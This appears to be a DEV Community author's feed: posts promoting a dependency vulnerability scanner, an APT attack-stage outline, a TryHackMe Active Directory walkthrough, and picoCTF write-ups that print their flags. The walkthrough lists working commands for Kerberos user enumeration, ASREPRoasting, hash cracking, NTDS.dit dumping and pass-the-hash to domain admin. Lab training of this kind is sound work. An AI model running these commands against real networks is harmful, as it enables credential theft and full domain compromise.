DEV Community: zerogru Art of Vector

Please don't rely solely on "black-box" security tools.

zerogru Art of Vector — Mon, 16 Feb 2026 02:10:17 +0000

Please don't rely solely on "black-box" security tools.

Enterprise scanners are essential, but they often lack the agility needed for real-time, context-aware compliance.

I recently developed a custom Python-based vulnerability engine designed to bridge the gap between raw network data and the NIST Cybersecurity Framework (CSF).

By automating the mapping of scan results directly to NIST controls, I’ve found that:
Customization > Generic Scans: Scripting allows for surgical precision in identifying assets that standard tools might overlook.

Continuous Governance: Automation isn't just about speed; it’s about moving from "point-in-time" audits to a state of Continuous Monitoring.

The Python Edge: Leveraging libraries like Nmap and Scapy allows us to build lean, modular security layers that integrate directly into existing CI/CD pipelines.

In modern cybersecurity, the goal isn't just to find vulnerabilities-it's to architect a measurable, automated defense.

How are you automating your compliance workflows this year?

Let's talk strategy in the comments. 👇
Pypi: https://lnkd.in/egFsMnEB

Chifleton 0.2.1 is now live on PyPI

zerogru Art of Vector — Wed, 11 Feb 2026 17:32:32 +0000

Chifleton

Chifleton is a lightweight dependency vulnerability scanner for Python and JavaScript package ecosystems.

It uses OSV.dev as the data source to check known vulnerabilities and produce structured, audit-ready reports. :contentReference[oaicite:1]{index=1}

PyPI Release — Version 0.2.1

Released: February 11, 2026

Install:

pip install chifleton==0.2.1

Chifleton helps developers and small teams discover and document dependency vulnerabilities in a reproducible way, ideal for security reviews, compliance, and continuous integration workflows.

Features

Scans dependency files:
- Python — requirements.txt, pyproject.toml
- JavaScript — package.json, package-lock.json, yarn.lock, pnpm-lock.yaml
Generates terminal output as well as HTML and JSON reports
Designed for audit and compliance use cases
OSV vulnerability data, no proprietary feeds :contentReference[oaicite:3]{index=3}

Quick Start

pip install chifleton==0.2.1

Scan dependencies and generate HTML + JSON reports:

chifleton scan requirements.txt --report html

Usage Examples

Default scan (HTML + JSON):

chifleton scan

Scan a specific file:

chifleton scan pyproject.toml

CI: mark build as failed if vulnerabilities are found:

chifleton scan --fail-on-vuln

About

Dependency vulnerability scanning and reporting is essential for secure software supply chains.

Chifleton provides clear outputs suitable for review, documentation, and audit trails — useful for teams, open-source projects, and compliance automation. :contentReference[oaicite:4]{index=4}

❤️ Maintainer

Author: Jaeha Yoo

License

MIT License

Chifleton — An Open-Source Dependency Vulnerability Scanner

zerogru Art of Vector — Wed, 11 Feb 2026 07:46:06 +0000

Evidence-ready dependency audits for Python projects.

Chifleton is a CLI tool that produces structured, audit-friendly reports (JSON / HTML) for Python dependency security reviews.

It is not just about finding vulnerabilities.

It is about making results reviewable, repeatable, and explainable.

Why Chifleton?

Most tools stop at providing a simple list:

“Here is a list of CVEs.”

But real security reviews and compliance audits require more:

Scope: What exact dependencies were checked?
Provenance: Which data source was used? (e.g., https://osv.dev)
Context: When was the scan run?
Persistence: Can results be reviewed later without re-running the scan?

Chifleton focuses on what comes after detection — producing structured evidence suitable for documentation and audit trails.

Features

Scans Python dependency files:
- requirements.txt
- pyproject.toml
Queries public vulnerability data via OSV.dev
Generates:
- JSON reports (machine-readable automation)
- HTML reports (human-readable audit artifacts)
Designed as a reporting companion — not a replacement for existing scanners

Installation

git clone https://github.com/0x5A65726F677275/chifleton
cd chifleton
pip install .

Usage

Basic scan:

chifleton scan requirements.txt

Generate an HTML report:

chifleton scan requirements.txt --report html

Example output:

Scanning dependencies...
Resolving versions...
Querying vulnerability database...
Generating report...
Report saved to scan-report.html

When Should You Use It?

Chifleton is ideal for:

Python projects undergoing formal security reviews
Maintainers who need archived audit artifacts
Teams that want structured, reproducible security evidence

If you only need quick vulnerability checks during development, tools like pip-audit may be sufficient.

Use Chifleton when you need documented, reviewable evidence.

Repository Structure

chifleton/
├─ chifleton/       # Core CLI implementation
├─ ASSESSMENT.md    # Policy / audit alignment notes
├─ SECURITY.md      # Security reporting policy
└─ LICENSE          # MIT

Author

Jaeha Yoo

License

MIT

Built a Python Dependency Audit Tool Because Vulnerability Lists Weren’t Enough

zerogru Art of Vector — Wed, 11 Feb 2026 01:11:11 +0000

Chifleton

Evidence-ready dependency audits for Python projects.

Chifleton is a CLI tool that produces structured, audit-friendly reports (JSON / HTML) for Python dependency security reviews.

It is not just about finding vulnerabilities.

It is about making results reviewable, repeatable, and explainable.

Why Chifleton?

Most tools stop at providing a simple list:

“Here is a list of CVEs.”

But real security reviews and compliance audits require more:

Scope: What exact dependencies were checked?
Provenance: Which data source was used? (e.g., https://osv.dev)
Context: When was the scan run?
Persistence: Can results be reviewed later without re-running the scan?

Chifleton focuses on what comes after detection — producing structured evidence suitable for documentation and audit trails.

Features

Scans Python dependency files:
- requirements.txt
- pyproject.toml
Queries public vulnerability data via OSV.dev
Generates:
- JSON reports (machine-readable automation)
- HTML reports (human-readable audit artifacts)
Designed as a reporting companion — not a replacement for existing scanners

Installation

git clone https://github.com/0x5A65726F677275/chifleton
cd chifleton
pip install .

Usage

Basic scan:

chifleton scan requirements.txt

Generate an HTML report:

chifleton scan requirements.txt --report html

Example output:

Scanning dependencies...
Resolving versions...
Querying vulnerability database...
Generating report...
Report saved to scan-report.html

When Should You Use It?

Chifleton is ideal for:

Python projects undergoing formal security reviews
Maintainers who need archived audit artifacts
Teams that want structured, reproducible security evidence

If you only need quick vulnerability checks during development, tools like pip-audit may be sufficient.

Use Chifleton when you need documented, reviewable evidence.

Repository Structure

chifleton/
├─ chifleton/       # Core CLI implementation
├─ ASSESSMENT.md    # Policy / audit alignment notes
├─ SECURITY.md      # Security reporting policy
└─ LICENSE          # MIT

Author

Jaeha Yoo

License

MIT

Advanced Persistent Threat (APT) Definition

zerogru Art of Vector — Wed, 21 Jan 2026 16:37:30 +0000

Look for Information (Reconnaissance)
Find out who works at the company.
Learn what systems they use.
Search online for useful details (emails, software, etc.).
Break In (Initial Access)
Send fake emails with bad links or files.
Hack a weak or unprotected system.
Use stolen passwords if available.
Stay Inside (Persistence)
Install tools to get back in later.
Set up hidden ways to reconnect (like backdoors).
Make sure access survives a system restart.
Get More Power (Privilege Escalation)
Find ways to become an admin.
Take over accounts with more access.
Explore the Network (Internal Recon)
Look around to see what other computers are connected.
Find important data or systems.
Move Around (Lateral Movement)
Use the current access to reach more systems.
Try to get to the most valuable targets (like servers or data storage).
Steal Data (Exfiltration)
Collect important files or information.
Send the data out without being noticed.
Hide Evidence (Covering Tracks)
Erase logs and other signs of the attack.
Use methods that make the attack hard to trace.

Master Active Directory: Attacktive Directory (TryHackMe) Walkthrough

zerogru Art of Vector — Wed, 21 Jan 2026 15:51:48 +0000

Attacktive Directory Walkthrough (TryHackMe)

Active Directory Enumeration → Kerberos Abuse → Domain Compromise

About This Walkthrough

This guide documents the full exploitation path for the Attacktive Directory machine on TryHackMe.

The objective is to walk through a realistic Active Directory attack chain, covering the core pillars of a Windows domain engagement:

Enumeration

Kerberos exploitation

Credential harvesting

Lateral movement and full domain compromise

This is a hands-on, attacker-side perspective, designed for learners who already understand basic networking and Linux tooling.

Learning Objectives

By the end of this walkthrough, you will understand how to:

AD Enumeration
Map domain services, users, and attack surface.

Kerberos Exploitation
Abuse misconfigurations using ASREPRoasting.

Credential Harvesting
Crack Kerberos hashes using Hashcat.

Domain Takeover
Dump NTDS.dit and perform Pass-the-Hash attacks.

Tooling Requirements

Ensure the following tools are installed before starting:

Impacket
A powerful collection of scripts for interacting with Windows protocols.

Kerbrute
Used for Kerberos-based username enumeration.

Enum4linux
Useful for SMB and NetBIOS discovery.

Hashcat
Industry-standard password cracking tool.

Step-by-Step Walkthrough
1. Enumeration (DNS & Ports)

First, map the target IP address to the domain name:

echo "10.10.194.183 spookysec.local" | sudo tee -a /etc/hosts


Next, run a targeted scan against Active Directory–related ports:

nmap -p53,88,135,139,389,445,636,3268 -A -T4 spookysec.local


This confirms:

Domain Controller presence

Kerberos (88)

LDAP (389/636)

SMB (445)

2. Finding Valid Users (Kerberos Enumeration)

Kerberos allows username validation without triggering account lockouts.

Using Kerbrute, enumerate valid domain users:

kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt


Any valid usernames discovered here become prime candidates for Kerberos attacks.

3. ASREPRoasting (Initial Access)

If a user account has “Do not require Kerberos pre-authentication” enabled, you can request a Ticket Granting Ticket (TGT) without credentials.

Use Impacket’s GetNPUsers.py:

python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -usersfile userlist.txt


This returns an AS-REP hash that can be cracked offline.

4. Cracking Kerberos Hashes

Use Hashcat to crack the AS-REP hash.

Hash mode: 18200 (Kerberos 5 AS-REP)

hashcat -m 18200 hash.txt wordlist.txt


Once cracked, you gain plaintext credentials for a domain account.

5. Privilege Escalation & Domain Admin

With valid service account credentials, dump secrets directly from the Domain Controller:

python3 secretsdump.py -just-dc backup@spookysec.local


This extracts:

NTLM hashes

Domain Administrator credentials

Full Active Directory credential database (NTDS.dit)

6. Pass-the-Hash (Domain Compromise)

Using the Administrator NTLM hash, authenticate without knowing the password:

python3 psexec.py Administrator@spookysec.local -hashes :


You now have:

SYSTEM shell

Full Domain Admin access

Complete domain compromise

Key Takeaways

Kerberos misconfigurations often provide silent initial access

Password cracking is still one of the weakest links in AD security

Service accounts are frequent escalation paths

NTLM hashes are often as powerful as plaintext passwords

[picoctf]Binary Search writeup

zerogru Art of Vector — Sat, 10 Aug 2024 21:19:32 +0000

Title:

Binary Search

Author:

Jeffery John

Date:

8/10/2024

Challenge Description

https://play.picoctf.org/practice/challenge/442

Difficulty Level

Easy

Setup

kali linux

Solution Overview

Detailed Steps

1.This Game try to type down guess!

ssh -p 54518 ctf-player@atlas.picoctf.net
ctf-player@atlas.picoctf.net's password: 
Welcome to the Binary Search Game!
I'm thinking of a number between 1 and 1000.
Enter your guess: 500
Lower! Try again.
Enter your guess: 250
Higher! Try again.
Enter your guess: 350
Higher! Try again.
Enter your guess: 450
Lower! Try again.
Enter your guess: 400
Lower! Try again.
Enter your guess: 370
Higher! Try again.
Enter your guess: 390
Higher! Try again.
Enter your guess: 395
Lower! Try again.
Enter your guess: 394
Congratulations! You guessed the correct number: 394
Here's your flag: picoCTF{g00d_gu355_2e90d29b}
Connection to atlas.picoctf.net closed.

Final Exploit/Flag

Here's your flag: picoCTF{g00d_gu355_2e90d29b}

Lessons Learned

General Skills

References

[picoctf] Scan Surprise writeup

zerogru Art of Vector — Sat, 10 Aug 2024 21:17:30 +0000

Title:

Scan Surprise

Author:

Jeffery John

Date:

8/10/2024

Challenge Description

https://play.picoctf.org/practice/challenge/444

Difficulty Level

Easy

Setup

kali linux

Solution Overview

Detailed Steps

1.List information about the /home/ctf-player/drop-in FILEs all

ls
flag.png

2.zbar tool read png file barcode
zbarimg

Final Exploit/Flag

zbarimg  home/ctf-player/drop-in/flag.png 
QR-Code:picoCTF{p33k_@_b00_0194a007}
scanned 1 barcode symbols from 1 images in 0.02 seconds

Lessons Learned

Forensics

References

https://linux.die.net/man/1/ls
https://zbar.sourceforge.net/

[picoctf] Verify writeup

zerogru Art of Vector — Sat, 10 Aug 2024 20:02:58 +0000

Title:

Verify

Author:

Jeffery John

Date:

8/10/2024

Challenge Description

https://play.picoctf.org/practice/challenge/450

Difficulty Level

Easy

Setup

kali linux

Solution Overview

Detailed Steps

1.List information about the /home FILEs all

ls -al
total 28
drwxr-xr-x 3 root root  4096 Mar 11 20:09 .
drwxr-xr-x 3 root root  4096 Aug 10 14:31 ..
-rw-r--r-- 1 root root    65 Mar 11 20:09 checksum.txt
-rwxr-xr-x 1 root root   856 Mar 11 20:09 decrypt.sh
drwxr-xr-x 2 root root 12288 Mar 11 20:09 files

2.Concatenate FILE(s), or standard input, to standard output.

cat checksum.txt                             
3ad37ed6c5ab81d31e4c94ae611e0adf2e9e3e6bee55804ebc7f386283e366a4

Check SHA256(256-bit) checksums read with file. and also search checksum.txt output character.

sha256sum files/* | grep "3ad37ed6c5ab81d31e4c94ae611e0adf2e9e3e6bee55804ebc7f386283e366a4"
3ad37ed6c5ab81d31e4c94ae611e0adf2e9e3e6bee55804ebc7f386283e366a4  files/e018b574

4.run decrypt.sh

./decrypt.sh files/e018b574
Error: 'files/e018b574' is not a valid file. Look inside the 'files' folder with 'ls -R'!

I got error message

5.When i found decrypt.sh code i saw that is. openssl cryptofrphy toolkit.

cat decrypt.sh  
        #!/bin/bash

        # Check if the user provided a file name as an argument
        if [ $# -eq 0 ]; then
            echo "Expected usage: decrypt.sh <filename>"
            exit 1
        fi

        # Store the provided filename in a variable
        file_name="$1"

        # Check if the provided argument is a file and not a folder
        if [ ! -f "/home/ctf-player/drop-in/$file_name" ]; then
            echo "Error: '$file_name' is not a valid file. Look inside the 'files' folder with 'ls -R'!"
            exit 1
        fi

        # If there's an error reading the file, print an error message
        if ! openssl enc -d -aes-256-cbc -pbkdf2 -iter 100000 -salt -in "/home/ctf-player/drop-in/$file_name" -k picoCTF; then
            echo "Error: Failed to decrypt '$file_name'. This flag is fake! Keep looking!"
        fi

6.code said openssl by Encoding with Ciphers.

Final Exploit/Flag

openssl enc -d -aes-256-cbc -pbkdf2 -iter 100000 -salt -in "files/e018b574" -k picoCTF
picoCTF{trust_but_verify_e018b574}

Lessons Learned

Forensics

References

https://linux.die.net/man/1/ls
https://linux.die.net/man/1/cat
https://linux.die.net/man/1/file
https://linux.die.net/man/1/grep
https://linux.die.net/man/1/sha256sum
https://linux.die.net/man/1/openssl